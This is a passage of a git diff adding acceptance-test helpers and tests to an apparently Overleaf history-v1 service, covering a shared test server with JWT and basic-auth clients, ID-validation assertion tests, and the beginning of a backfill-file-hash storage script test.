'base64' + ) + +async function listenOnRandomPort() { + if (server) return // already running + for (let i = 0; i < 10; i++) { + try { + server = await startApp(0) + return + } catch {} + } + server = await startApp(0) +} + +after('close server', function (done) { + if (server) { + server.close(done) + } else { + done() + } +}) + +export default { + testUrl, + basicAuthHeader, + listenOnRandomPort, +} diff --git a/services/history-v1/test/acceptance/js/api/support/test_backup_verifier_server.mjs b/services/history-v1/test/acceptance/js/api/support/test_backup_verifier_server.mjs new file mode 100644 index 0000000..57a805e --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/support/test_backup_verifier_server.mjs @@ -0,0 +1,43 @@ +// @ts-check +import { startApp } from '../../../../../backup-verifier-app.mjs' + +/** @type {import("http").Server} */ +let server + +/** + * @param {string} pathname + * @return {string} + */ +function testUrl(pathname) { + const url = new URL('http://127.0.0.1') + const addr = server.address() + if (addr && typeof addr === 'object') { + url.port = addr.port.toString() + } + url.pathname = pathname + return url.toString() +} + +async function listenOnRandomPort() { + if (server) return // already running + for (let i = 0; i < 10; i++) { + try { + server = await startApp(0) + return + } catch {} + } + server = await startApp(0, false) +} + +after('close server', function (done) { + if (server) { + server.close(done) + } else { + done() + } +}) + +export default { + testUrl, + listenOnRandomPort, +} diff --git a/services/history-v1/test/acceptance/js/api/support/test_projects.js b/services/history-v1/test/acceptance/js/api/support/test_projects.js new file mode 100644 index 0000000..df4d83e --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/support/test_projects.js @@ -0,0 +1,26 @@ +const BPromise = require('bluebird') +const { expect } = require('chai') +const HTTPStatus = require('http-status') +const assert = require('../../../../../storage/lib/assert') + +const testServer = require('./test_server') + +/** + * Without a provided history id, a new one will get generated. + * The history id could either be a mongo id, or a postgres id. + * + * @param {string} [existingHistoryId] + * @return {Promise<string>} + */ +exports.createEmptyProject = function (existingHistoryId) { + return BPromise.resolve( + testServer.basicAuthClient.apis.Project.initializeProject({ + body: { projectId: existingHistoryId }, + }) + ).then(response => { + expect(response.status).to.equal(HTTPStatus.OK) + const { projectId } = response.obj + assert.projectId(projectId, 'bad projectId') + return projectId + }) +} diff --git a/services/history-v1/test/acceptance/js/api/support/test_server.js b/services/history-v1/test/acceptance/js/api/support/test_server.js new file mode 100644 index 0000000..ac6550b --- /dev/null +++ b/services/history-v1/test/acceptance/js/api/support/test_server.js @@ -0,0 +1,133 @@ +/** + * @file + * Create a test server. For performance reasons, there is only one test server, + * and it is shared between all of the tests. + * + * This uses the mocha's "root-level hooks" to start and clean up the server. + */ + +const BPromise = require('bluebird') +const config = require('config') +const http = require('node:http') +const jwt = require('jsonwebtoken') + +const Swagger = require('swagger-client') + +const app = require('../../../../../app') + +function testUrl(pathname, opts = {}) { + const url = new URL('http://127.0.0.1') + url.port = exports.server.address().port + url.pathname = pathname + if (opts.qs) { + url.searchParams = new URLSearchParams(opts.qs) + } + return url.toString() +} + +exports.url = testUrl + +function createClient(options) { + // The Swagger client returns native Promises; we use Bluebird promises. Just + // wrapping the client creation is enough in many (but not all) cases to + // get Bluebird into the chain. + return BPromise.resolve(new Swagger(testUrl('/api-docs'), options)) +} + +function createTokenForProject(projectId, opts = {}) { + const jwtKey = opts.jwtKey || config.get('jwtAuth.key') + const jwtAlgorithm = config.get('jwtAuth.algorithm') + return jwt.sign({ project_id: projectId }, jwtKey, { + algorithm: jwtAlgorithm, + }) +} + +exports.createTokenForProject = createTokenForProject + +function createClientForProject(projectId, opts = {}) { + const token = createTokenForProject(projectId, opts) + return createClient({ authorizations: { jwt: `Bearer ${token}` } }) +} + +exports.createClientForProject = createClientForProject + +function createClientForDownloadZip(projectId) { + const token = createTokenForProject(projectId) + return createClient({ authorizations: { token } }) +} + +exports.createClientForDownloadZip = createClientForDownloadZip + +function createBasicAuthClient() { + return createClient({ + authorizations: { + basic: { + username: 'staging', + password: config.get('basicHttpAuth.password'), + }, + }, + }) +} + +function createPseudoJwtBasicAuthClient() { + // HACK: The history service will accept HTTP basic auth for any endpoint that + // is expecting a JWT. If / when we fix that, we will need to fix this. + const jwt = + 'Basic ' + + Buffer.from(`staging:${config.get('basicHttpAuth.password')}`).toString( + 'base64' + ) + return createClient({ authorizations: { jwt } }) +} + +exports.basicAuthHeader = + 'Basic ' + + Buffer.from(`staging:${config.get('basicHttpAuth.password')}`).toString( + 'base64' + ) + +function createServer() { + const server = http.createServer(app) + return app.setup().then(() => { + exports.server = server + return server + }) +} + +function createDefaultUnauthenticatedClient() { + return createClient().then(client => { + exports.client = client + }) +} + +function createDefaultBasicAuthClient() { + return createBasicAuthClient().then(client => { + exports.basicAuthClient = client + }) +} + +function createDefaultPseudoJwtBasicAuthClient() { + return createPseudoJwtBasicAuthClient().then(client => { + exports.pseudoJwtBasicAuthClient = client + }) +} + +before(function () { + function listenOnRandomPort(server) { + const listen = BPromise.promisify(server.listen, { context: server }) + return listen(0).catch(err => { + if (err.code !== 'EADDRINUSE' && err.code !== 'EACCES') throw err + return listenOnRandomPort(server) + }) + } + + return createServer() + .then(listenOnRandomPort) + .then(createDefaultUnauthenticatedClient) + .then(createDefaultBasicAuthClient) + .then(createDefaultPseudoJwtBasicAuthClient) +}) + +after(function () { + exports.server.close() +}) diff --git a/services/history-v1/test/acceptance/js/storage/assert.test.js b/services/history-v1/test/acceptance/js/storage/assert.test.js new file mode 100644 index 0000000..6ba30e2 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/assert.test.js @@ -0,0 +1,248 @@ +'use strict' + +const OError = require('@overleaf/o-error') +const { expect } = require('chai') +const assert = require('../../../../storage/lib/assert') + +describe('assert', function () { + describe('blobHash', function () { + it('should not throw for valid blob hashes', function () { + expect(() => + assert.blobHash( + 'aad321caf77ca6c5ab09e6c638c237705f93b001', + 'should be a blob hash' + ) + ).to.not.throw() + }) + + it('should throw for invalid blob hashes', function () { + try { + assert.blobHash('invalid-hash', 'should be a blob hash') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a blob hash') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: 'invalid-hash' }) + } + }) + + it('should throw for string integer blob hashes', function () { + try { + assert.blobHash('123', 'should be a blob hash') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a blob hash') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: '123' }) + } + }) + }) + + describe('projectId', function () { + it('should not throw for valid mongo project ids', function () { + expect(() => + assert.projectId('507f1f77bcf86cd799439011', 'should be a project id') + ).to.not.throw() + }) + + it('should not throw for valid postgres project ids', function () { + expect(() => + assert.projectId('123456789', 'should be a project id') + ).to.not.throw() + }) + + it('should throw for invalid project ids', function () { + try { + assert.projectId('invalid-id', 'should be a project id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a project id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: 'invalid-id' }) + } + }) + + it('should throw for non-numeric project ids', function () { + try { + assert.projectId('12345x', 'should be a project id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a project id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: '12345x' }) + } + }) + + it('should throw for postgres ids starting with 0', function () { + try { + assert.projectId('0123456', 'should be a project id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a project id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: '0123456' }) + } + }) + }) + + describe('chunkId', function () { + it('should not throw for valid mongo chunk ids', function () { + expect(() => + assert.chunkId('507f1f77bcf86cd799439011', 'should be a chunk id') + ).to.not.throw() + }) + + it('should not throw for valid postgres chunk ids', function () { + expect(() => + assert.chunkId('123456789', 'should be a chunk id') + ).to.not.throw() + }) + + it('should throw for invalid chunk ids', function () { + try { + assert.chunkId('invalid-id', 'should be a chunk id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a chunk id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: 'invalid-id' }) + } + }) + + it('should throw for integer chunk ids', function () { + try { + assert.chunkId(12345, 'should be a chunk id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a chunk id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: 12345 }) + } + }) + }) + + describe('mongoId', function () { + it('should not throw for valid mongo ids', function () { + expect(() => + assert.mongoId('507f1f77bcf86cd799439011', 'should be a mongo id') + ).to.not.throw() + }) + + it('should throw for invalid mongo ids', function () { + try { + assert.mongoId('invalid-id', 'should be a mongo id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a mongo id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: 'invalid-id' }) + } + }) + + it('should throw for numeric mongo ids', function () { + try { + assert.mongoId('12345', 'should be a mongo id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a mongo id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: '12345' }) + } + }) + + it('should throw for mongo ids that are too short', function () { + try { + assert.mongoId('507f1f77bcf86cd79943901', 'should be a mongo id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a mongo id') + expect(OError.getFullInfo(error)).to.deep.equal({ + arg: '507f1f77bcf86cd79943901', + }) + } + }) + + it('should throw for mongo ids that are too long', function () { + try { + assert.mongoId('507f1f77bcf86cd7994390111', 'should be a mongo id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a mongo id') + expect(OError.getFullInfo(error)).to.deep.equal({ + arg: '507f1f77bcf86cd7994390111', + }) + } + }) + }) + + describe('postgresId', function () { + it('should not throw for valid postgres ids', function () { + expect(() => + assert.postgresId('123456789', 'should be a postgres id') + ).to.not.throw() + expect(() => + assert.postgresId('1', 'should be a postgres id') + ).to.not.throw() + }) + + it('should throw for invalid postgres ids', function () { + try { + assert.postgresId('invalid-id', 'should be a postgres id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a postgres id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: 'invalid-id' }) + } + }) + + it('should throw for postgres ids starting with 0', function () { + try { + assert.postgresId('0123456', 'should be a postgres id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a postgres id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: '0123456' }) + } + }) + + it('should throw for postgres ids that are too long', function () { + try { + assert.postgresId('12345678901', 'should be a postgres id') + expect.fail() + } catch (error) { + expect(error).to.be.instanceOf(TypeError) + expect(error.message).to.equal('should be a postgres id') + expect(OError.getFullInfo(error)).to.deep.equal({ arg: '12345678901' }) + } + }) + }) + + describe('regex constants', function () { + it('MONGO_ID_REGEXP should match valid mongo ids', function () { + expect('507f1f77bcf86cd799439011').to.match(assert.MONGO_ID_REGEXP) + expect('abcdef0123456789abcdef01').to.match(assert.MONGO_ID_REGEXP) + }) + + it('MONGO_ID_REGEXP should not match invalid mongo ids', function () { + expect('invalid-id').to.not.match(assert.MONGO_ID_REGEXP) + expect('507f1f77bcf86cd79943901').to.not.match(assert.MONGO_ID_REGEXP) // too short + expect('507f1f77bcf86cd7994390111').to.not.match(assert.MONGO_ID_REGEXP) // too long + expect('507F1F77BCF86CD799439011').to.not.match(assert.MONGO_ID_REGEXP) // uppercase + }) + + it('POSTGRES_ID_REGEXP should match valid postgres ids', function () { + expect('123456789').to.match(assert.POSTGRES_ID_REGEXP) + expect('1').to.match(assert.POSTGRES_ID_REGEXP) + }) + + it('POSTGRES_ID_REGEXP should not match invalid postgres ids', function () { + expect('invalid-id').to.not.match(assert.POSTGRES_ID_REGEXP) + expect('0123456').to.not.match(assert.POSTGRES_ID_REGEXP) // starts with 0 + expect('12345678901').to.not.match(assert.POSTGRES_ID_REGEXP) // too long (> 10 digits) + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/back_fill_file_hash.test.mjs b/services/history-v1/test/acceptance/js/storage/back_fill_file_hash.test.mjs new file mode 100644 index 0000000..fad87b4 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/back_fill_file_hash.test.mjs @@ -0,0 +1,1548 @@ +import fs from 'node:fs' +import Crypto from 'node:crypto' +import Stream from 'node:stream' +import { setTimeout } from 'node:timers/promises' +import { promisify } from 'node:util' +import { ObjectId, Binary } from 'mongodb' +import { + db, + backedUpBlobs, + globalBlobs, +} from '../../../../storage/lib/mongodb.js' +import cleanup from './support/cleanup.js' +import testProjects from '../api/support/test_projects.js' +import { execFile } from 'node:child_process' +import chai, { expect } from 'chai' +import chaiExclude from 'chai-exclude' +import config from 'config' +import ObjectPersistor from '@overleaf/object-persistor' +import { WritableBuffer } from '@overleaf/stream-utils' +import { + backupPersistor, + projectBlobsBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import projectKey from '../../../../storage/lib/project_key.js' +import { + BlobStore, + makeProjectKey, +} from '../../../../storage/lib/blob_store/index.js' + +chai.use(chaiExclude) +const TIMEOUT = 20 * 1_000 + +const { deksBucket } = config.get('backupStore') +const { tieringStorageClass } = config.get('backupPersistor') + +const projectsCollection = db.collection('projects') +const deletedProjectsCollection = db.collection('deletedProjects') +const deletedFilesCollection = db.collection('deletedFiles') + +const FILESTORE_PERSISTOR = ObjectPersistor({ + backend: 'gcs', + gcs: { + endpoint: { + apiEndpoint: process.env.GCS_API_ENDPOINT, + projectId: process.env.GCS_PROJECT_ID, + }, + }, +}) + +/** + * @param {ObjectId} objectId + * @return {string} + */ +function gitBlobHash(objectId) { + return gitBlobHashBuffer(Buffer.from(objectId.toString())) +} + +/** + * @param {Buffer} buf + * @return {string} + */ +function gitBlobHashBuffer(buf) { + const sha = Crypto.createHash('sha1') + sha.update(`blob ${buf.byteLength}\x00`) + sha.update(buf) + return sha.digest('hex') +} + +/** + * @param {string} gitBlobHash + * @return {Binary} + */ +function binaryForGitBlobHash(gitBlobHash) { + return new Binary(Buffer.from(gitBlobHash, 'hex')) +} + +async function listS3Bucket(bucket, wantStorageClass) { + const client = backupPersistor._getClientForBucket(bucket) + const response = await client.listObjectsV2({ Bucket: bucket }).promise() + + for (const object of response.Contents || []) { + expect(object).to.have.property('StorageClass', wantStorageClass) + } + + return (response.Contents || []).map(item => item.Key || '') +} + +function objectIdFromTime(timestamp) { + return ObjectId.createFromTime(new Date(timestamp).getTime() / 1000) +} + +const PRINT_IDS_AND_HASHES_FOR_DEBUGGING = false + +describe('back_fill_file_hash script', function () { + this.timeout(TIMEOUT) + const USER_FILES_BUCKET_NAME = 'fake-user-files-gcs' + + const projectId0 = objectIdFromTime('2017-01-01T00:00:00Z') + const projectId1 = objectIdFromTime('2017-01-01T00:01:00Z') + const projectId2 = objectIdFromTime('2017-01-01T00:02:00Z') + const projectId3 = objectIdFromTime('2024-01-01T00:03:00Z') + const projectIdDeleted0 = objectIdFromTime('2017-01-01T00:04:00Z') + const projectIdDeleted1 = objectIdFromTime('2024-01-01T00:05:00Z') + const projectIdNoHistory = objectIdFromTime('2017-01-01T00:06:00Z') + const projectIdNoHistoryDeleted = objectIdFromTime('2017-01-01T00:07:00Z') + const projectIdHardDeleted = objectIdFromTime('2017-01-01T00:08:00Z') + const projectIdNoOverleaf = objectIdFromTime('2017-01-01T00:09:00Z') + const projectIdNoOverleafDeleted = objectIdFromTime('2017-01-01T00:10:00Z') + const projectIdBadFileTree0 = objectIdFromTime('2024-01-01T00:11:00Z') + const projectIdBadFileTree1 = objectIdFromTime('2024-01-01T00:12:00Z') + const projectIdBadFileTree2 = objectIdFromTime('2024-01-01T00:13:00Z') + const projectIdBadFileTree3 = objectIdFromTime('2024-01-01T00:14:00Z') + const historyId0 = 42 // stored as number is mongo + const historyId1 = projectId1.toString() + const historyId2 = projectId2.toString() + const historyId3 = projectId3.toString() + const historyIdDeleted0 = projectIdDeleted0.toString() + const historyIdDeleted1 = projectIdDeleted1.toString() + const historyIdBadFileTree0 = projectIdBadFileTree0.toString() + const historyIdBadFileTree1 = projectIdBadFileTree1.toString() + const historyIdBadFileTree2 = projectIdBadFileTree2.toString() + const historyIdBadFileTree3 = projectIdBadFileTree3.toString() + const fileId0 = objectIdFromTime('2017-02-01T00:00:00Z') + const fileId1 = objectIdFromTime('2017-02-01T00:01:00Z') + const fileId2 = objectIdFromTime('2017-02-01T00:02:00Z') + const fileId3 = objectIdFromTime('2017-02-01T00:03:00Z') + const fileId4 = objectIdFromTime('2017-02-01T00:04:00Z') + const fileId5 = objectIdFromTime('2024-02-01T00:05:00Z') + const fileId6 = objectIdFromTime('2017-02-01T00:06:00Z') + const fileId7 = objectIdFromTime('2017-02-01T00:07:00Z') + const fileId8 = objectIdFromTime('2017-02-01T00:08:00Z') + const fileId9 = objectIdFromTime('2017-02-01T00:09:00Z') + const fileIdDeleted1 = objectIdFromTime('2017-03-01T00:01:00Z') + const fileIdDeleted2 = objectIdFromTime('2017-03-01T00:02:00Z') + const fileIdDeleted3 = objectIdFromTime('2017-03-01T00:03:00Z') + const fileIdDeleted4 = objectIdFromTime('2024-03-01T00:04:00Z') + const fileIdDeleted5 = objectIdFromTime('2024-03-01T00:05:00Z') + const contentTextBlob0 = Buffer.from('Hello 0') + const hashTextBlob0 = gitBlobHashBuffer(contentTextBlob0) + const contentTextBlob1 = Buffer.from('Hello 1') + const hashTextBlob1 = gitBlobHashBuffer(contentTextBlob1) + const contentTextBlob2 = Buffer.from('Hello 2') + const hashTextBlob2 = gitBlobHashBuffer(contentTextBlob2) + const contentTextBlob3 = Buffer.from('Hello 3') + const hashTextBlob3 = gitBlobHashBuffer(contentTextBlob3) + const deleteProjectsRecordId0 = new ObjectId() + const deleteProjectsRecordId1 = new ObjectId() + const deleteProjectsRecordId2 = new ObjectId() + const deleteProjectsRecordId3 = new ObjectId() + const deleteProjectsRecordId4 = new ObjectId() + const twoByteUTF8Symbol = 'ö' + const contentFile7 = Buffer.alloc(4_000_000, twoByteUTF8Symbol) + const hashFile7 = gitBlobHashBuffer(contentFile7) + const potentiallyWrittenBlobs = [ + { projectId: projectId0, historyId: historyId0, fileId: fileId0 }, + // { historyId: projectId0, fileId: fileId6 }, // global blob + { + projectId: projectId0, + historyId: historyId0, + fileId: fileId7, + hash: hashFile7, + content: contentFile7, + }, + { projectId: projectId0, historyId: historyId0, fileId: fileIdDeleted5 }, + { + projectId: projectId0, + historyId: historyId0, + hash: hashTextBlob0, + content: contentTextBlob0, + }, + { + projectId: projectId1, + historyId: historyId1, + hash: hashTextBlob1, + content: contentTextBlob1, + }, + { + projectId: projectId2, + historyId: historyId2, + hash: hashTextBlob2, + content: contentTextBlob2, + }, + { projectId: projectId1, historyId: historyId1, fileId: fileId1 }, + { projectId: projectId1, historyId: historyId1, fileId: fileIdDeleted1 }, + { + projectId: projectId2, + historyId: historyId2, + fileId: fileId2, + hasHash: true, + }, + { projectId: projectId3, historyId: historyId3, fileId: fileId3 }, + { + projectId: projectIdDeleted0, + historyId: historyIdDeleted0, + fileId: fileId4, + }, + { + projectId: projectIdDeleted0, + historyId: historyIdDeleted0, + fileId: fileIdDeleted2, + }, + // { historyId: historyIdDeleted0, fileId:fileIdDeleted3 }, // fileIdDeleted3 is dupe of fileIdDeleted2 + { + projectId: projectIdDeleted0, + historyId: historyIdDeleted0, + fileId: fileIdDeleted4, + hasHash: true, + }, + { + projectId: projectIdDeleted1, + historyId: historyIdDeleted1, + fileId: fileId5, + hasHash: true, + }, + { + projectId: projectIdBadFileTree0, + historyId: historyIdBadFileTree0, + hash: hashTextBlob3, + content: contentTextBlob3, + }, + { + projectId: projectIdBadFileTree3, + historyId: historyIdBadFileTree3, + fileId: fileId9, + }, + ] + if (PRINT_IDS_AND_HASHES_FOR_DEBUGGING) { + const fileIds = { + fileId0, + fileId1, + fileId2, + fileId3, + fileId4, + fileId5, + fileId6, + fileIdDeleted1, + fileIdDeleted2, + fileIdDeleted3, + fileIdDeleted4, + } + console.log({ + projectId0, + projectId1, + projectId2, + projectId3, + projectIdDeleted0, + projectIdDeleted1, + historyId0, + historyId1, + historyId2, + historyId3, + historyIdDeleted0, + historyIdDeleted1, + ...fileIds, + }) + for (const [name, v] of Object.entries(fileIds)) { + console.log( + name, + gitBlobHash(v), + Array.from(binaryForGitBlobHash(gitBlobHash(v)).value()) + ) + } + } + + async function populateMongo() { + await globalBlobs.insertMany([ + { _id: gitBlobHash(fileId6), byteLength: 24, stringLength: 24 }, + { _id: gitBlobHash(fileId8), byteLength: 24, stringLength: 24 }, + ]) + await projectsCollection.insertMany([ + { + _id: projectId0, + rootFolder: [ + { + fileRefs: [ + { _id: fileId8, hash: gitBlobHash(fileId8) }, + { _id: fileId0 }, + { _id: fileId6 }, + { _id: fileId7 }, + ], + folders: [{ fileRefs: [], folders: [] }], + }, + ], + overleaf: { history: { id: historyId0 } }, + }, + { + _id: projectId1, + rootFolder: [ + { + fileRefs: [{ _id: fileId1 }], + folders: [ + { + fileRefs: [], + folders: [{ fileRefs: [{ _id: fileId1 }], folders: [] }], + }, + ], + }, + ], + overleaf: { history: { id: historyId1 } }, + }, + { + _id: projectId2, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [{ _id: fileId2, hash: gitBlobHash(fileId2) }], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyId2 } }, + }, + { + _id: projectId3, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [{ _id: fileId3 }], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyId3 } }, + }, + { + _id: projectIdNoHistory, + rootFolder: [{ fileRefs: [], folders: [] }], + overleaf: { history: { conversionFailed: true } }, + }, + { + _id: projectIdNoOverleaf, + rootFolder: [{ fileRefs: [], folders: [] }], + }, + { + _id: projectIdBadFileTree0, + overleaf: { history: { id: historyIdBadFileTree0 } }, + }, + { + _id: projectIdBadFileTree1, + rootFolder: [], + overleaf: { history: { id: historyIdBadFileTree1 } }, + }, + { + _id: projectIdBadFileTree2, + rootFolder: [{ fileRefs: [{ _id: null }] }], + overleaf: { history: { id: historyIdBadFileTree2 } }, + }, + { + _id: projectIdBadFileTree3, + rootFolder: [ + { + folders: [null, { folders: {}, fileRefs: 13 }], + fileRefs: [{ _id: fileId9 }], + }, + ], + overleaf: { history: { id: historyIdBadFileTree3 } }, + }, + ]) + await deletedProjectsCollection.insertMany([ + { + _id: deleteProjectsRecordId0, + project: { + _id: projectIdDeleted0, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [{ fileRefs: [{ _id: fileId4 }], folders: [] }], + }, + ], + }, + ], + overleaf: { history: { id: historyIdDeleted0 } }, + }, + deleterData: { + deletedProjectId: projectIdDeleted0, + }, + }, + { + _id: deleteProjectsRecordId1, + project: { + _id: projectIdDeleted1, + rootFolder: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [], + folders: [ + { + fileRefs: [{ _id: fileId5, hash: gitBlobHash(fileId5) }], + folders: [], + }, + ], + }, + ], + }, + ], + overleaf: { history: { id: historyIdDeleted1 } }, + }, + deleterData: { + deletedProjectId: projectIdDeleted1, + }, + }, + { + _id: deleteProjectsRecordId2, + project: { + _id: projectIdNoHistoryDeleted, + rootFolder: [{ fileRefs: [], folders: [] }], + overleaf: { history: { conversionFailed: true } }, + }, + deleterData: { + deletedProjectId: projectIdNoHistoryDeleted, + }, + }, + { + _id: deleteProjectsRecordId3, + deleterData: { deletedProjectId: projectIdHardDeleted }, + }, + { + _id: deleteProjectsRecordId4, + project: { + _id: projectIdNoOverleafDeleted, + rootFolder: [{ fileRefs: [], folders: [] }], + }, + deleterData: { + deletedProjectId: projectIdNoOverleafDeleted, + }, + }, + ]) + await deletedFilesCollection.insertMany([ + { _id: fileIdDeleted1, projectId: projectId1 }, + { _id: fileIdDeleted2, projectId: projectIdDeleted0 }, + { _id: fileIdDeleted3, projectId: projectIdDeleted0 }, + { + _id: fileIdDeleted4, + projectId: projectIdDeleted0, + hash: gitBlobHash(fileIdDeleted4), + }, + { _id: fileIdDeleted5, projectId: projectId0 }, + ]) + } + + async function populateHistoryV1() { + await Promise.all([ + testProjects.createEmptyProject(historyId0.toString()), + testProjects.createEmptyProject(historyId1), + testProjects.createEmptyProject(historyId2), + testProjects.createEmptyProject(historyId3), + testProjects.createEmptyProject(historyIdDeleted0), + testProjects.createEmptyProject(historyIdDeleted1), + testProjects.createEmptyProject(historyIdBadFileTree0), + testProjects.createEmptyProject(historyIdBadFileTree1), + testProjects.createEmptyProject(historyIdBadFileTree2), + testProjects.createEmptyProject(historyIdBadFileTree3), + ]) + + const blobStore0 = new BlobStore(historyId0.toString()) + await blobStore0.putString(contentTextBlob0.toString()) + const blobStore1 = new BlobStore(historyId1.toString()) + await blobStore1.putString(contentTextBlob1.toString()) + const blobStore2 = new BlobStore(historyId2.toString()) + await blobStore2.putString(contentTextBlob2.toString()) + const blobStoreBadFileTree = new BlobStore(historyIdBadFileTree0.toString()) + await blobStoreBadFileTree.putString(contentTextBlob3.toString()) + } + + async function populateFilestore() { + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileId0}`, + Stream.Readable.from([fileId0.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileId6}`, + Stream.Readable.from([fileId6.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileId7}`, + Stream.Readable.from([contentFile7]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId0}/${fileIdDeleted5}`, + Stream.Readable.from([fileIdDeleted5.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId1}/${fileId1}`, + Stream.Readable.from([fileId1.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId2}/${fileId2}`, + Stream.Readable.from([fileId2.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId3}/${fileId3}`, + Stream.Readable.from([fileId3.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectIdDeleted0}/${fileId4}`, + Stream.Readable.from([fileId4.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectIdDeleted1}/${fileId5}`, + Stream.Readable.from([fileId5.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectId1}/${fileIdDeleted1}`, + Stream.Readable.from([fileIdDeleted1.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectIdDeleted0}/${fileIdDeleted2}`, + Stream.Readable.from([fileIdDeleted2.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectIdDeleted0}/${fileIdDeleted3}`, + // same content as 2, deduplicate + Stream.Readable.from([fileIdDeleted2.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectIdDeleted0}/${fileIdDeleted4}`, + Stream.Readable.from([fileIdDeleted4.toString()]) + ) + await FILESTORE_PERSISTOR.sendStream( + USER_FILES_BUCKET_NAME, + `${projectIdBadFileTree3}/${fileId9}`, + Stream.Readable.from([fileId9.toString()]) + ) + } + + async function prepareEnvironment() { + await cleanup.everything() + await populateMongo() + await populateHistoryV1() + await populateFilestore() + } + + /** + * @param {Array<string>} args + * @param {Record<string, string>} env + * @param {boolean} shouldHaveWritten + * @return {Promise<{result, stats: any}>} + */ + async function tryRunScript(args = [], env = {}, shouldHaveWritten) { + let result + try { + result = await promisify(execFile)( + process.argv0, + [ + 'storage/scripts/back_fill_file_hash.mjs', + '--processNonDeletedProjects=true', + '--processDeletedProjects=true', + '--processDeletedFiles=true', + ...args, + ], + { + encoding: 'utf-8', + timeout: TIMEOUT - 500, + env: { + ...process.env, + USER_FILES_BUCKET_NAME, + SLEEP_BEFORE_EXIT: '1', + ...env, + LOG_LEVEL: 'warn', // Override LOG_LEVEL of acceptance tests + }, + } + ) + result.status = 0 + } catch (err) { + const { stdout, stderr, code } = err + if (typeof code !== 'number') { + console.log(err) + } + result = { stdout, stderr, status: code } + } + expect((await fs.promises.readdir('/tmp')).join(';')).to.not.match( + /back_fill_file_hash/ + ) + const extraStatsKeys = [ + 'eventLoop', + 'readFromGCSThroughputMiBPerSecond', + 'writeToAWSThroughputMiBPerSecond', + ] + const stats = JSON.parse( + result.stderr + .split('\n') + .filter(l => l.includes('LOGGING_IDENTIFIER')) + .pop() + ) + expect(Object.keys(stats.diff).sort()).to.deep.equal( + [...extraStatsKeys, ...Object.keys(STATS_ALL)].sort() + ) + delete stats.diff + expect(new Date(stats.time).toISOString()).to.equal(stats.time) + delete stats.time + if (shouldHaveWritten) { + expect(stats.readFromGCSThroughputMiBPerSecond).to.be.greaterThan(0) + expect(stats.writeToAWSThroughputMiBPerSecond).to.be.greaterThan(0) + } + for (const key of extraStatsKeys) { + delete stats[key] + } + delete stats.LOGGING_IDENTIFIER + expect(stats.deferredBatches).to.have.length( + 0, + 'should not have any remaining deferred batches' + ) + delete stats.deferredBatches + return { stats, result } + } + + /** + * @param {Array<string>} args + * @param {Record<string, string>} env + * @param {boolean} shouldHaveWritten + * @return 